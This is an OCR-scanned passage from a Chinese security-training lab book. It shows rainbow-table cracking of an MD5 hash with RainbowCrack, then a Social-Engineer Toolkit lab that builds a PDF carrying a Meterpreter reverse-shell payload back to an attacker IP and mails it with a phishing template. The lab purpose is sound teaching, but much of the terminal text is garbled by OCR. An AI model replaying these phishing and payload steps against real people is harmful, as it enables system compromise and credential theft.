dex chain len chain num part index 

rtgen hash algorithm charset plaintext” len min plaintegt len max taile in 
dex -bench 


hash algorithms implemented in alglib80.so: 
lm, plaintext len limit: 9 - 7 
ntlm, plaiptext len limit: 9 - 45 
md5, plainkext len limit Q- 15 
Shajg* plaiBteWt Len Mimiko - 20 
hysqtshal, f giSinieNt AenWlmit:fO - 20 
halflmchall, plaintext len limif: 9 - 7 
ntlmchall, plaintext len limit: 8 - 15 
oracle-SYSTEM, plaintext len limit: O - 18 
md5-half, plaintext len limit: 9 - 15 


example: rtgen md5 loweralpha 1 7 0 1000 1000 9 
rtgen md5 loweralpha 1 7 8 -bench 
rootbt : /pentest/passwords/rainbowcracks $ 


1-29 ”使 用 “. /rtgen” 命 令 查看 帮助 文档 


步骤 4: 创建 第 一 张 彩 虹 表 ,保存 为 md5 loweralpha£ 5-5 0 2000x80000 testing. rt X 
件 ,如 图 1-30 所 示 。 

步骤 5: 创建 第 二 张 彩 虹 表 ,保存 为 md5 loweralpha # 5-5 1 2000x80000 testing. rt 
文件 。 

步骤 6: 使 用 "1s” 命 令 查看 刚 生 成 的 两 张 彩 虹 表 ,如 图 1-31 所 示 。 
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^ v X root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 


oot@bt: /pentest/passwords /rainbowcrack4 å 
ot@bt: /pentest/passwords/rainbowcrack# 

oot@bt: /pentest/passwords/rainbowcrack£ 
oot@bt: /pentest/passwords/rainbowcrack# 

root@bt: /pentest/passwords/rainbowcrack# 

root@bt: /pentest/passwords/rainbowcrack# ./rtgen md5_oWeratpha 5 9 2900 80000 
testing 

rainbow table md5 loweralpha£5-5 © 2000x80000 8.rt parameters 

hash algorithm: md5 

hash length: 16 

charset: abcdefghijklmnopqrstuvwxyz 

charset in hex: 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 79 TEIR 73 
74 75 76 77 78 79 7a 

charset length 

ptLaafitexE lengfh Tanges - 3 

redUse offset: Ox 99968900 

plaintext total: 11881376 


sequential starting point begin from 0 (0x06000000000000000) 
generating... 

32768 of 80000 rainbow chains generated (© m 19.1 s) 

65536 of 80080 rainbow chains generated (8 m 19.2 s) 

80000 of 80000 rainbow chains generated (8 m 8.5 s) 
rootgbt: /pentest/passwords /rainbowcracks 


图 1-30 创建 第 一 张 彩 虹 表 


^ * X root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 


用 Footebt : /pentest/passwords/rainbowcrack£4 
oot@bt: /pentest/passwords/ralinbowcrack# 
: /pentest/passwords/rainbowcrack# 
: /pentest/passwords/rainbowcrack# 
: /pentest/passwords /rainbowcrack£ 
: /pentest/passwords/rainbowcrack4 ls 
.s0  md5 loweralphas5-5 0 2000x80000 0.rt^ rcrack FtZrtcwtgen 
.txt md5 loweralpha45-5 1 2080x80008 9.rt readme.txty rtc2rt rtsSert 
: /pentest/passwords /rainbowcrack4 
: /pentest/passwords /rainbowcracks 
: /pentest/passwords /rainbowcracks$ 
bt: /pentest/passwords /rainbowcracks 
: /pentest/passwords /rainbowcgacks 
: /pente$ L/passwords/ra&inbowcfacka 
Pentest /Bassabriis / raifiboswcfacks 
bt: /hentast/passuürüs ur dilibowcfacks 
t: /pentest/passwords/rainbowcfack4 
: /pentest/passwords /rainbowcracks 
: /pentest/passwords /rainbowcracks 
ot: /pentest/passwords /rainbowcrack4 
: /pentest/passwords /rainbowcracke 
: /pentest/passwords /rainbowcracks 
: /pentest /passwords /rainbowcracks 
t: /pentest/passwords /rainbowcrack£ 


图 1-31 使 用 “Ils” 命令 查看 生成 的 两 张 彩虹 表 


步骤 7: 使 用 “. /rtsort” 命 令 查 看 帮助 文档 ,如 图 1-32 所 示 。 

步骤 8: 使 用 rtsort 工具 整理 第 一 张 彩虹 表 , 如 图 1-33 所 示 。 

步骤 9: 使 用 rtsort 工具 整理 第 二 张 彩虹 表 。 

步骤 10: EH“. /rcrack” 命 令 查 看 rcrack 工具 的 帮助 文档 。 

步骤 1: 本 实验 将 使 用 rcrack 工具 破解 abcde 的 md5 散 列 
ab56b4d92b40713acc5af89985d4b786 ,如 图 1-34 所 示 。 

结果 (result) 为 abcde, 破 解 成 功 , 如 图 1-35 所 示 。 


^ v 


oot&àbt 
bt 


bt: / 
Dt: / 


ot&bt: 


rootà&b1t 
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x root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 


: /pentest/ 
; /pentest 
tGbt : /pentest 
bt: 
bt: / 
bt: / 
Dt: 
otabt: 
übt: 


/pentest 
pentest 


/pentest 
pentest 


/pentest 


pentest 
pentest 
/pentest 


: /pentest 


pentest, 


passwords /rainbowcrack£ 


/passwords /rainbowcracks$ 


'passwords /rainbowcracke 
passwords /rainbowcrack£ 
passwords /rainbowcrack4 
passwords /rainbowcrack4 


/passwords /rainbowcrack* 
/passwords /rainbowcrack 


'passwords /rainbowcracks 


/passwords /rainbowcrack£ 


'passwords/rainbowcracks 


/passwords /rainbowcracks 


passwords /rainbowcgack4 


rootébt: /pente$ L/passwords/rainbowcEaclgli. /rEsort 
RajiDowgrGck 15 

Copy ght*«2003929TOXRadnBawC PO OK. Prüject$s A1 hidbt*&.rds wed. 
Official Website: http: //project-ralinbowcrack. com/ 


usage: rtsort rt files [rt files ...] 
rtsort rt files [rt files ...] -s X 


Use -s switch to sort rainbow tables by start point, otherwise rainbow tables ar 
e sorted by end point. 
rootébt: /pentest/passwords /rainbowcrack£ B 


图 1-32 使 用 “. /rtsort” 命 令 查 看 帮助 文档 


^ v X root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 


tébt: /pentest/passwords/rainbowcrack4 ./rtsort md5 loweralphas5-5 0 2000x 
0 @.rt à ld 
md5 loweralphas5-5 8 20900x800900 9.rt: 
851337216 bytes memory available 
loading rainbow table... 
sorting rainbow table by end point... 
writing sorted rainbow table... 


ootóbt : /pentest/passwords /rainbowcrack4 
rootébt : /pentest/passwords /rainbowcrack£ 
ootébt : /pentest/passwords /rainbowcracks 
rootébt : /pentest/passwords/rainbowcrack£ 
gotébt : /pentest/passwords /rainbowcgack£ 
rootébt : /pente$ L/passwords/rainbowcfackaf 
ogtibt M penteast /Basswüridis /raamnbowcpack4 
roo tibt: /pentast/Passyarüs ur di lbowc Fack4 
9otébt : /pentest/passwords/rainbowcfack4 
rootébt : /pentest/passwords/rainbowcrack* 
rootébt : /pentest/passwords /rainbowcracks 
rootébt : /pentest/passwords /rainbowcrack 


图 1-33 ”使 用 rtsort 工具 整理 第 一 张 彩虹 表 


^ v X root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 


aürootébt:/pentest/passwords/rainbowcrack£ ./rcrack *.rt -h ab56b4d92b40713acc5af8 


9985d4b786 

851202048 bytes memory available 

2 x 1280000 bytes memory allocated for table buffer 

32000 bytes memory allocated for chain traverse 

disk: md5 loweralphas5-5 9 2000x80000 9.rt: 1280000 bytfS read 
disk: md5 loweralphas5-5 1 2000x80000 0.rt: 1289000 bytes read 
searching for 1 hash... 

plaintext of ab56b4d92b40713acc5af89985d4b786 is abcde 

disk: thread aborted 


statistics 


plaintext foung, 
totet timet: 

time of*^chail.ifa2Verse! 

time of alarm check: 

time of wait: 

time of other operation: 
time of disk read: 
hash & reduce calculation of chain traverse: 
hash & reduce calculation of alarm check: 
number of alarm: 


speed of chain traverse: 3.37 million/s 


B] 1-34 使 用 rcrack 工具 破解 abcde 的 mds 散 列 值 
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^ v X root@bt: /pentest/passwords/rainbowcrack 


File Edit View Terminal Help 
fdisk: md5 loweralpha45-5 1 2000x80000 9.rt: 
searching for 1 hash... 


1280000 bytes 


read 


plaintext of ab56b4d92b40713acc5af89985d4b786 1s-abede 


disk: thread aborted 


statistics 


time of chain traverse: 

time of alarm check: 

time of wait: 

time of other operation: 
time of disk rRad: 
ha & péduce Kalg&ulaidoHg ofüEdhain fravdrsdi 
hasI^& reWuce iPalfutaidomof Warm hecki 
number of alarm: 


1 of 1 
0.60 s 
0.59 s 
9.00 s 
0.00 s 
0.00 s 
0.01 S 
l99gbpgeo 
45 

32 


3.37 million/s 
8.04 million/s 


speed of chain traverse: 
speed of alarm check: 


I 


ab56b4d92b40713acc5af89985d4b786 abcde hex:6162636465 
oot@bt: /pentest/passwords /rainbowcracks 


1-35 显示 破解 后 的 结果 


1.4.4 任务 与 思考 


出 于 安全 考虑 ,在 互联 网 上 的 应 用 系统 中 ,大 量 用 户 信息 在 保存 到 数据 库 之 前 都 会 通过 
MD5 等 方式 进行 加 密 处 理 。 但 是 ,攻击 者 为 了 获得 大 量 的 用 户 信 息 ,首先 通过 拖 库 方式 获 
得 用 户 被 MD5 加 密 后 的 信息 ,再 利用 彩虹 表 等 方式 进行 破解 。 

读者 在 本 实验 的 基础 上 ,通过 查阅 相关 资料 ,并 通过 具体 的 实验 ,进一步 操作 以 下 内 容 。 

(1) BackTrack 5 的 操作 方法 。 

(2) 拖 库 的 概念 及 实现 方法 。 

(3) MD5 算法 及 实现 方法 。 


1.5 电 了 于 邮件 攻击 : 利用 社会 工程 学 工具 发 送 恶意 邮件 


1.5.1 预备 知识 : 社会 工程 学 与 电子 邮件 攻击 


1. 电子 邮件 攻击 

电子 邮件 攻击 是 一 种 专门 针对 电子 邮件 系统 的 DoS/DDoS 攻击 方式 。 由 于 电子 邮件 
在 互联 网 中 的 应 用 非常 普遍 ,同时 与 电子 邮件 相关 的 SNMP、POP3 和 IMAP 等 协议 在 设计 
上 都 存在 一 定 的 安全 漏洞 ,因此 为 攻击 的 实施 提供 了 可 被 利用 的 资源 。 电 子 邮件 攻击 有 很 
多 种 ,主要 表现 在 以 下 几 方 面 。 

(OD 先 取 和 算 改 数据 。 通 过 监听 数据 包 或 截取 正在 传输 的 信息 ,可 以 使 攻击 者 读 取 或 
修改 数据 。 通 过 网 络 监听 程序 实现 ,在 Windows 系统 中 可 以 使 用 NetXRay, 在 UNIX 和 
Linux 系统 中 可 以 使 用 Tepdump ,另外 还 可 以 使 用 更 为 专业 的 Sniffer 工具 。 

(2) 伪造 邮件 。 通 过 伪造 的 电子 邮件 地 址 (尤其 是 发 件 人 地 址 ) 可 以 对 收 件 人 实施 诈骗 
攻击 。 
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(3) 拒绝 服务 。 让 系统 或 网 络 充 斥 大 量 的 垃圾 邮件 ,从 而 没有 余力 去 处 理 其 他 的 事情 ， 
造成 系统 邮件 服务 需 或 网 络 的 次 痪 。 

(4) 病毒 。 在 互联 网 环境 中 ,很 多 病毒 的 广泛 传播 是 通过 电子 邮件 实现 的 。 

2. 社会 工程 学 介绍 

社会 工程 学 是 利用 人 性 弱点 获取 目标 系统 有 价值 信息 的 系列 方法 , 它 是 一 种 欺骗 的 艺 
术 。 当 缺乏 目标 系统 的 可 用 信息 时 ,该 方法 是 渗透 测试 者 重要 的 手段 之 一 。 对 于 任何 组 织 
而 言 , 人 与 人 之 间 的 关联 既是 安全 措施 中 最 薄弱 的 一 环 , 也 是 整个 安全 基础 设施 最 脆弱 的 地 
方 。 作 为 社会 人 ,天 性 使 得 其 对 社会 工程 学 攻击 的 抵抗 力 不 强 。 社 会 工程 学 攻击 者 通常 利 
用 这 一 特点 ,获取 机 密 信息 或 受 限 数据 。 社 会 工程 学 的 实现 方式 多 种 多 样 ,而且 每 种 方式 根 
据 采 用 方式 和 手段 的 不 同 , 取 得 的 效果 也 会 不 同 。 
1.5.2 实验 目的 和 条 件 


1. 实验 目的 


通过 本 实验 ,使 读者 在 熟悉 电子 邮件 系统 工作 原理 的 基础 上 ,结合 社会 工程 学 攻击 手 
段 , 学 习 电 子 邮 件 攻 击 的 基本 原理 和 方法 。 


2. 实验 清单 及 软 硬 件 要 求 
本 实验 所 需要 的 软 人 硬件 清单 如 表 1-5 所 示 。 
表 1-5 Nmap 工具 应 用 实验 清单 


类 型 F 号 软 硬 件 要 求 规 格 


1f 

BIEKSEUE | BackTrack SOT) 
Kum BackTrack-Exploitation Tools-Social 

-Ex "x 
3 软件 版 本 Mica ied 
Engineering Tools 

1f 
ur] 操作 系统 版 本 RedHat 

软件 版 本 X 


1.5.3 实验 过 程 


1. 登录 攻击 机 并 启动 社会 工程 学 攻击 工具 

主要 操作 过 程 如 下 。 

步骤 1: 登录 BT5 主机 (第 一 次 局 动 目标 主机 时 ,还 需要 安装 Java 控件 ) 。 

步骤 2: 如 果 进 入 的 是 命令 行 模式 ,可 以 输入 “startx” 命 令 进 入 图 形 界 面 。 对 于 Linux 
操作 不 是 很 熟悉 的 读者 ,建议 进入 图 形 界 面 进行 相应 的 操作 。 

步骤 3: 进入 图 形 化 界面 后 ,选择 启动 BackTrack-Exploitation Tools-Social Engineering 
Toolkit-set 程序 ,如 图 1-36 所 示 。 

步骤 4: 提示 用 户 是 否 同意 服务 条 球 , 输 入 “y” 命 令 表示 同意 ,随后 正常 启动 该 程序 ,如 
图 1-37 所 示 。 
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Applications Places System [57] d Thu Jan 31, 10:44 PM 


^ v X Terminal 
File Edit View Terminal Help 


Copyright 2812, The Social-Engineer Toolkit (SET) by TrustedSec, LLC 
All rights reserved. 


Redistribution and use in source and binary forms, with or W*e&hbout modification, 
are permitted provided that the following condttiOns are meis 


* Redistributions of source code must retain-the above copyf'lght "e&ire, thi 
s list of conditions and the following disclaimer. 
* Redistributions in binary form must reproduce the abovdi copyright notive, 
this list of conditions and the following disclaimer 
in the documentation and/or other materials provided witl'hhesdisliribution 


* Neither the name of Sogial-Engineer Toolkit nor the nameg of "+ts seont nibdt 
ors may be usdi to endorse.oB nromofe pducts derived From 
thas 0 07. 2 4 "4. Syecifig prr [g5^- d [36 12i 


THIS SOFTWARE IS PROVIDED BY THE CORYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 

LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICUL 
AR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 

OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, E 
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 

LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR P 
ROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 


图 1-36 ”启动 BackTrack-Exploitation Tools-Social Engineering Toolkit-set 程序 


^ v X Terminal 
File Edit View Terminal Help 


Note that the Social-Engineer Toolkit is provided as is, and is a royalty free o 
pen-source application. 


Feel free to modify, use, change, market, do-whatever you waD& with it as long a 
s you give the appropriate credit where credit 

is due (which means giving the authors the credit^they deservegfor wr**àus. it). 
Also note that by using this software, if you ever 

see the creator of SET in a bar, you are required to give himla hug and buy Wim 
a beer. Hug must last at least 5 seconds. Author 

holds the right to refuse the hug or the beer. 


Do you agree to the terms of service [y/n]: y 


01011801811011110111610100100000011100 


图 1-37 输入 “y” 命 令 同 意 服务 条 款 


步骤 5: 接 下 来 有 7 个 选项 ,分 别 是 社会 工程 学 攻击 (Social-Engineering Attacks) ,快速 
通道 渗透 测试 (Fast-Track Penetration Testing) ,第 三 方 模块 (Third Party Modules) 更 新 
metasploit( Update the Metasploit Framework), 8 jr 4E & T f£^£ T H. £j (Update the 
Social-Engineer Toolkit) 更 新 该 程序 设置 选项 (Update SET configuration) , # HJ (Help, 
Credits. and About) ,如 图 1-38 所 示 。 
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^ v X Terminal 
File Edit View Terminal Help 
[--- Homepage: https://www.trustedsec.com 


Welcome to the Social-Engineer Toolkit (SET)-—Yewr-one 
stop shop for all of your social-engineering needs.. 


Join us on irc.freenode.net in channel $setoolkii 


The Social-Engineer Toolkit is a product of TrustedSec. 


Visit: https://www.trustedsec.com 
Select from the menu: 


1) Social-EBgineering ALtücks 

27 Fast-Tra£k PeneigafiongiEsting 

3^ Thid Par&yMedutes 

4) Update the Metasploit Framewofk 

5) Update the Social-Engineer Toolkit 
6) Update SET configuration 

7) Help, Credits, and About 


Exit the Social-Engineer Toolkit 


图 1-38 BT5 功能 选项 列表 


2. 进行 社会 工程 学 攻击 

主要 操作 过 程 如 下 。 

步骤 1: 由 于 本 实验 需要 进行 社会 工程 学 攻击 ,因此 在 图 1-38 中 选择 Social-Engineering 
Attacks 选项 。 

在 接 下 来 的 窗口 中 ,出 现 了 3 个 选项 ,如 图 1-39 所 示 , 分 别 是 执行 一 次 邮件 攻击 
(Perform a Mass Email Attack) ,创建 一 个 文件 格式 人 负 信 (Create a FileFormat Payload) 和 
创建 一 个 社会 工程 学 模板 (Create a Social-Engineering Template)。 在 本 实验 中 ,需要 进行 
邮件 攻击 ,所 以 选择 Perform a Mass Email Attack 选项 。 

^ v X Terminal 


File Edit View Terminal Help 
99) Return back to the main menu. 


et» 1 


The Spearphishing module allows you to specially craiL^wmail messages and send 
them to a large (or small) number of-peóple with atLaehéd fileformat malicious 
payloads. If you want to spoof your email addreéSs, be suliessSendmail" is in- 
stalled (apt-get install sendmail) and chánge the confiófset config. SENDMAIL-OF 
F 

flag to SENDMAIL-ON. 


There are two options, one is getting your feet wet and 【GebnmgaesI do 
everything for you (option 1), the second is to create your own FilbePFb5«mat 
payloadgand use it ingyour on attack. Either way, good luck and" emj oy! 


1) Peffotn,a"MaSs Email Attack 
2) Create 3uFtTleéRormat?PayEfoad 
3) Create a Social-Engineefing Template 


99} Return to Main Menu 


Select the file format exploit you want. 


图 1-39 选择 攻击 方式 
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步骤 2. 进入 负荷 选项 ,共有 16 项 ,如 图 1-40 所 示 , 分 别 是 DLL 注入 攻击 文档 UNC 
LM SMB 捕捉 攻击 、 缓冲 汶 出 攻击 等 。 在 本 实验 中 选择 Adobe PDF Embedded EXE Social 
Engineering 选项 , 即 选择 “PDF 文件 社会 工程 学 ”。 


^ v X Terminal 
File Edit View Terminal Help 


set >]1 
Select the file format exploit you want. 
The default is the PDF embedded EXE. 


SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 

SET Custom Written Document UNC LM SMB Capture A 吉 ack 
Microsoft Windows CreateSizedDIBSECTION Stack Buff&r Overflow 
Microsoft Word RTF pFragments Stack Buffer Overflow TMSa8s96) 
Adobe Flash Player "Button" Remote Code Execution 

Adebe CoolType SEG Table "uniqueName" Ovená low 

Adajea Fuasb Pkay® Jnewfunod&kenLslgvalidsROR nper U$e 

Adübe Totabacol BittEmailInf® Hüffer"DuerfUp 

Adober Cobiab "yet Icon. Buffer Overflow 

Adobe JBIG2Decode Memory Corruption Exploit 

Adobe PDF Embedded EXE Social Engineering 

Adobe util.printf() Buffer Overflow 

Custom EXE to VBA (sent via RAR) (RAR required) 

Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 

Adobe PDF Embedded EXE Social Engineering (NOJS) 

Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 


图 1-40 负荷 选择 列表 


步骤 3: PDF 攻击 类 型 有 两 种 ,分 别 是 用 自己 的 PDF 文件 攻击 还 是 用 系统 内 置 的 PDF 
攻击 ,如 图 1-41 所 示 。 在 本 实验 中 选择 Use built-in BLANK PDF for attack 选项 , 即 “ 用 系 
统 内 置 的 PDF 攻击 ”。 


^ v X Terminal 
File Edit View Terminal Help 
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027) 


[s»11 


[-] Default payload creation selected. SET will generaté a normal PDF with embed 
ded EXE. 


l. Use your own PDF for attack 
2. Use built-in BLANK PDF for attack 
15»2 
1) Windows Reyerse,TCP Shall Spawn a.cdihmand seo vietim end 
sem back to Bttückek 
Z^ wimdows MeserüceteF»ReVeTse TEP Sha sdietpreter shell on victim 
and send back to attacker 
3) Windows Reverse VNC DLL Spawn a VNC server Olf Victim and se 
nd back to attacker 
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse 
TCP Inline 
5) Windows Meterpreter Reverse TCP (X64) Connect back to the attacker (Windo 
ws x64), Meterpreter 
6) Windows Shell Bind TCP (X64) Execute payload and create an accepi 


图 1-41 选择 PDF 攻击 类 型 


步骤 A. 系统 要 求 攻击 者 选择 shell 负 共 的 类 型 ,如 图 1-42 所 示 ,这 些 shell f& fur fibi: c 
弹 到 本 地 的 负 和 荷 。 本 实验 中 选择 Windows Meterpreter Reverse-TCP and send back to 
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attacker 选项 , 即 利用 Meterpreter 与 目标 建立 后 门 联 系 。 


|^ v x Terminal 
File Edit View Terminal Help 
2. Use built-in BLANK PDF for attack 


15»2 


1) Windows Reverse TCP Shell Spawn d command. &hell on victim and 
send back to attacker 
2) Windows Meterpreter Reverse TCP Spawfi a meterprete shettagnyictim 
and send back to attacker 
3) Windows Reverse VNC DLL Spawn a VNC servér on victim ame se 
nd back to attacker 
4) Windows Reverse TCP Shell (x64) Windows X64 CommamüssheLll,. Reverse 


TCP Inline 

5) Windows Meterpreter Reyerse T&P (X64) Connect back to tlyje"attacker Wi ndo 
ws x64), Meterpreter 

8 Widows Shebl BaBdETCP M64) ExeQuue pdyfoad and create an accep 
tind*port*on rieuagteusyst en 

7) Windows Meterpreter Reverse HETPS Tunnel communicatdon"Üvef HTTP usin 
g SSL and use Meterpreter 


set:pay 1s>2 

;et» IP address for the payload listener: 

[1] Invatic ip address try again: 192.168.142.134 
set:payloads» Port to connect back on [443]: 

[-] Defaulting to port 443. 


图 1-42 ”选择 shell 负荷 的 类 型 


步骤 5: shell 将 返回 连接 的 地 址 ,本 实验 输入 的 IP 地 址 是 192. 168. 142. 134 m O AA 
为 443( 也 可 以 更 改 为 其 他 端口 ,一般 使 用 默认 的 443 ,因为 很 多 网 站 都 使 用 该 端口 ,所 以 对 
方 一 般 较 难 分 析出 来 )。 

步骤 6: 随后 是 系统 创建 文件 的 过 程 ,名 称 为 template. pdf。 文 件 创建 完成 后 ,系统 提 
示 是 否 修改 文件 名 ,如 图 1-43 所 示 。 其 中 ,“Keep the filename.I don't care. ”是 保持 原名 ， 
"Rename the file.I want to be cool. ”是 修改 文件 名 。 如 果 是 在 真实 的 网 络 攻 击 环境 中 , 攻 
击 者 一 般 会 更 改 文件 名 ,以 迷惑 被 攻击 者 。 本 实验 选择 “Keep the filename.I don't care. " 
选项 ,保持 原名 。 


^ v X Terminal 
File Edit View Terminal Help 


5 | Invalid ip address try again: 192.168.142.134 < 
(t:payloads» Port to connect back on [443]: 
[- -] pefaul ting to port 443. 
[-] Generating fileformat exploit.. 
[*] Payload creation complete. 
[*] All payloads get sent to the /pentest/exploits/set7STc/progham junk/template 
.pdf directory 
[-] As an added bonus, use the file-format créator in SET to Create your Etachm 
ent. 


Right now the attachment will be imported with filename of "Pemplaíe.whatever 


Do you want io rename theWfile? 


example Enti&g he. sew i en3me: Boo. pdi 


. Keep the filename, I don't care. 
. Rename the file, I want to be cool. 


set:phishing»l 
[*] Keeping the filename and moving on. 


Social Engineer Toolkit Mass E-Mailer d 


图 1-43 ”显示 返回 地 址 并 选择 是 否 修改 文件 名 
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步骤 7: 让 用 户 选 择 邮 件 模板 ,有 预定 义 模板 (Pre-Defined Template) 和 随机 生成 的 
炙 性 模板 (One-Time Use Email Template) 两 种 类 型 ,本 实验 中 选择 Pre-Defined Template 
选项 ,即使 用 预定 义 模块 ,如 图 1-44 所 示 。 


^ v X Terminal 
File Edit View Terminal Help 
99. Return to main menu. 


et:phishing»l 


Do you want to use a predefined template.or-craft 
a one time email template. 


1. Pre-Defined Template 
2. One-Time Use Email Template 


Set:phisning»l 

-] Available templates: 

: Dan Brown's, Angels & Demogs 

: Strange intércnet usage írüm yourgcomglter 
: IE CIE 

: StatusS*Repart 

: Computer Issue 

: How long has it been? 


Body Pics 
Have you seen this? 
J ANTE Confirmation 
ng>1 
g> Send email to:111Qabc.com 


图 1-44 选择 邮件 模板 类 型 


步骤 8: 要 求 用 户 选 择 预 定义 的 模板 。 系 统 提供 了 10 个 模板 ,本 实验 选择 Dan 
Brown's Angels & Demons 选项 。 

步骤 9: 系统 提示 输入 对 方 (被 攻击 者 ) 的 邮件 地 址 ,以 及 日 己 的 邮箱 地 址 和 密码 ,然后 
Hi B s HJ sendmail 将 邮件 发 送 , 如 图 1-45 所 示 。 


^ v X Terminal 
File Edit View Terminal Help 


1: Dan Brown's Angels & Demons 
2: Strange internet usage from your computer 
3: New Update 
4: Status Report 
5: Computer Issue 
6: How long has it been? 
7: This is crazy.. 
8: Baby Pics 
9: Have you seen this? 
18: PET. GONT LONE 
g»1 
hing» Send email to:111Qabc.com 


1. Use a gmall.Account farWyaur egBailf&ttack, 
ag" Usgsyour BwngseszwBrEor agen relay 


g»1 
et:phishing» Your gmail email address:sddffàgmail.com 
Email password. 
set:phishing» > Flag this Messnge/s as ba priority! [vesper yes 


Press (return) to view error message. 


图 1-45 选择 预定 义 模板 类 型 及 使 用 设置 收发 邮箱 
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随后 ,攻击 者 根据 已 有 的 设置 方式 ,将 攻击 邮箱 发 送 到 被 攻击 者 的 邮箱 中 。 
1.5.4 任务 与 思 


用 社会 工程 学 进行 攻击 的 过 程 没 有 通用 的 方法 ,但 是 ,社会 工程 学 有 一 些 基本 步骤 需要 
读者 擎 握 。 其 中 ,情报 收集 、 确 定 独 洞 点 ` 规 划 攻 击 和 执行 攻击 通 稼 是 社会 工程 学 攻击 者 采 
用 的 基本 步骤 ,这 些 步骤 可 有 效 地 获取 目标 信息 或 访问 权限 。 

根据 《网络 攻击 与 防御 技术 ;一 书 的 内 容 及 查阅 的 相关 文献 ,结合 社会 工程 学 攻击 的 实 
施 特 点 ,读者 要 进一步 学 习 情 报 收集 、 确 定 漏洞 点 ` 规 划 攻 击 和 执行 攻击 4 个 环节 的 特点 和 
具体 内 容 。 


第 2 瘟 Windows 操作 系统 攻防 实 训 


经 过 多 年 的 发 展 , Windows 操作 系统 的 功能 得 到 不 断 的 丰 宣 和 完善 ,目前 在 果 面 操作 
系统 中 已 占有 绝对 优势 ,而 且 许 多 互联 网 应 用 系统 也 运行 在 Windows 服务 器 操作 系统 上 。 
随 着 Windows 操作 系统 的 广泛 应 用 ,各 类 安全 漏洞 被 利用 的 现象 频繁 发 生 ,安全 已 经 成 为 
影响 Windows 操作 系统 应 用 的 一 个 主要 因素 。 本 音 通 过 相关 的 实验 使 读者 掌握 针对 
Windows 操作 系统 的 主要 攻击 和 防范 方法 。 


数据 处 理 安全 主要 涉及 在 数据 处 理 过程 中 的 各 个 环节 ,其 目的 是 对 数据 的 安全 性 进行 
管理 ,以 防止 攻击 者 窃取 数据 或 造成 数据 泄露 。 


2.1.1 预备 知识 : 数据 加 密 


数据 加 密 是 针对 数据 的 可 逆转 换 , 即 借助 加 密 工 具 对 数据 进行 可 逆 加 密 转 换 , 并 将 验证 
口令 以 不 可 逆 算 法 加 密 后 写 人 文件 中 。 通 过 加 密 , 可 以 实现 介质 中 存储 的 数据 或 网 络 节点 
之 间 传 输 数据 的 机 密 性 和 完整 性 。 加 密 是 对 访问 控制 方法 的 一 种 补充 ,对 笔记 本 电脑 、 智 能 
手机 等 易 丢 失 设备 上 的 数据 或 网 络 中 的 共享 文件 ,可 以 通过 加 密 进 行 有 效 的 保护 。 针 对 
Windows 相应 版 本 的 EFSCEncrypting File System ,加 密 文 件 系 统 ) 和 BitLocker 技术 ,都 是 
通过 加 密 技术 实现 的 。 


2.1.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,在 回顾 数据 加 密 的 相关 算法 和 实现 过 程 的 基础 上 ,以 目前 普遍 使 用 的 
Windows 应 用 环境 为 基础 ,通过 Idoo File Encryption 工具 应 用 方法 的 介绍 ,使 读者 掌握 数 
据 加 密 的 实现 方法 ,培养 读者 对 重要 数据 进行 加 密 管 理 的 良好 习惯 。 

2. 实验 条 件 

本 实验 仅 需要 一 台 运 行 Windows XP 及 以 上 版 本 的 计算 机 ,该 计算 机 既 可 以 是 一 台 物 
理 机 ,也 可 以 是 一 台 虚 拟 机 ,同时 还 需要 提供 Idoo File Encryption 加 密 工 具 。 


2.1.3 实验 过 程 


步骤 1. 登录 实验 操作 系统 (本 例 为 Windows XP). 
步骤 2: 安装 Idoo File Encryption 工具 软件 。 读 者 可 根据 安装 引导 说 明 完 成 安装 和 基 
本 配置 工作 ,只 是 在 出 现 如 图 2-1 所 示 的 对 话 框 时 ,需要 分 别 在 Type a password 和 Retype 
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your password 文本 框 内 输入 并 确认 Idoo File Encryption 工具 的 管理 密码 。 

完成 Idoo File Encryption 工具 的 安装 后 ,建议 在 果 面 创建 一 个 快捷 方式 。 

步骤 3: 运行 Idoo File Encryption ,在 出 现 的 对 话 框 中 输入 在 图 2-1 中 设置 的 管理 密 
码 , 单 击 OK 按钮 进行 确认 ,如 图 2-2 所 示 。 


Password of 1idoo File Encryption ... 
Creating a password is a smart security precaution that protect 
your user account from unwanted users Be sure to remember 
your password or keep it in a safe place. 

Type a password: 


.  —  —" 


Retype your password: 


ff you type your email address you can use i retrieve the rZ idoo File Encryption Free 5.6 
forgotten password when you forget the password. 


Email address: (Option) 9. Enter your password to run the program. 


Forgot the program's password? Retrieve Password 


[€ j( e JÒ " jJ 


2-1 输入 并 确认 Idoo File Encryption 2-2 输入 管理 密码 
工具 的 管理 密码 


步骤 4: 当 正 确 输入 密码 后 ,进入 如 图 2-3 所 示 的 Idoo File Encryption 操作 界面 。 


h idoo File Encryption Free 5.6 全 X 
Ire S 


Purchase Register | 
Lock Data > Lock Folders 


(9 Please add folders to the list below, then dick the "Lock Folders" button to complete the operation 
of locking folders, 


EL EBD 


r 
Add Folders Remove Folders — Clear Folders 


Folders 


Select: None All AllLocked All Normal 


| fg) (oc Folders | | fg Unlock Folders | 


图 2-3 doo File Encryption 操作 界面 


